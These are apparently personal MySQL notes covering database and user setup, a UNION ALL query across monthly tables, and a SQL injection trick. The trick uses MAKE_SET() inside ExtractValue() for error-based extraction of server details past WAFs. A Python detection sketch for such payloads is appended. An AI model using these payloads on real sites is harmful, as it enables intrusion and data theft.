1. Create a user and a database; the user has all privileges on that database and the global USAGE privilege
CREATE DATABASE owncloud;
CREATE USER owncloud@localhost IDENTIFIED BY 'mysecurepassword';
GRANT ALL PRIVILEGES ON owncloud.* TO owncloud@localhost;
FLUSH PRIVILEGES;
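2. Query all tables of the same structure and sort the result (the table_2014xx tables all share one structure; select their full contents, ordered by the idx column of each table in descending order)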
select * from (
    select * from table_201401
    union all select * from table_201402
    union all select * from table_201403
    union all select * from table_201404
    union all select * from table_201405
    union all select * from table_201406
    union all select * from table_201407
    union all select * from table_201408
    union all select * from table_201409
    union all select * from table_201410
    union all select * from table_201411
) data1
order by data1.idx desc
3. MySQL injection technique: MAKE_SET() as a substitute for CONCAT()
mysql> SELECT MAKE_SET(-1,@@version,database(),user(),@@version,user(),database());
+----------------------------------------------------------------------+
| MAKE_SET(-1,@@version,database(),user(),@@version,user(),database()) |
+----------------------------------------------------------------------+
| 5.1.69,u123_root,u123_root@localhost,5.1.69,u123_root@localhost,u123_root |
+----------------------------------------------------------------------+
1 row in set (0.00 sec)
This can sometimes bypass some WAFs. The example below is based on error-based injection:
SELECT 1 and ExtractValue(1,make_set(-1,0,user()))
Output:
#1105 - XPATH syntax error: ',user123@localhost'
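
A detection-side sketch for the point above, added here as an example and not part of the original notes: a filter keyed only on CONCAT( does not see the MAKE_SET() form, so the check below inspects what is passed into ExtractValue/UpdateXML instead. The function names, rule lists and the benign sample queries are assumptions made for the illustration.

```python
import re

XPATH_FUNCS = ("extractvalue", "updatexml")   # echo their argument in an XPath error
BUILDERS = ("concat", "concat_ws", "group_concat", "make_set")  # string assemblers
INFO = ("user()", "database()", "@@version", "version()")       # server details

def normalize(sql):
    """Lower-case, drop /* */ comments, collapse whitespace, tighten punctuation."""
    sql = re.sub(r"/\*.*?\*/", " ", sql.lower(), flags=re.S)
    sql = re.sub(r"\s+", " ", sql)
    return re.sub(r"\s*([(),])\s*", r"\1", sql)

def call_args(s, name):
    """Argument text of every call to `name`; heuristic, ignores quoted parentheses."""
    out = []
    for m in re.finditer(r"(?<![a-z0-9_])" + re.escape(name) + r"\(", s):
        depth, i = 1, m.end()
        while i < len(s) and depth:
            depth += {"(": 1, ")": -1}.get(s[i], 0)
            i += 1
        out.append(s[m.end():i - 1] if depth == 0 else s[m.end():])
    return out

def concat_only_rule(sql):
    """The narrow rule: flags only when CONCAT( appears."""
    return "concat(" in normalize(sql)

def findings(sql):
    """Flag XPath functions fed a built string, and MAKE_SET over server details."""
    s, hits = normalize(sql), []
    for f in XPATH_FUNCS:
        for args in call_args(s, f):
            if any(b + "(" in args for b in BUILDERS) or any(i in args for i in INFO):
                hits.append(f + ": XPath argument is computed, not a constant path")
    for args in call_args(s, "make_set"):
        if any(i in args for i in INFO):
            hits.append("make_set: server details in arguments")
    return hits

# Two statements from this page, then constructed benign queries (made-up names).
SAMPLES = [
    "SELECT 1 and ExtractValue(1,make_set(-1,0,user()))",
    "SELECT MAKE_SET(-1,@@version,database(),user(),@@version,user(),database());",
    "SELECT ExtractValue(doc, '/order/id') FROM orders WHERE id = 7",
    "SELECT CONCAT(first_name, ' ', last_name) FROM users",
]
if __name__ == "__main__":
    for q in SAMPLES:
        print(concat_only_rule(q), findings(q), q, sep=" | ")
```

The CONCAT-only rule misses both statements from this page and flags the harmless name query, while the argument-based check flags the first two and leaves the constant-path ExtractValue call alone. Parameterized queries remain the fix; a rule like this is only a logging or WAF signal.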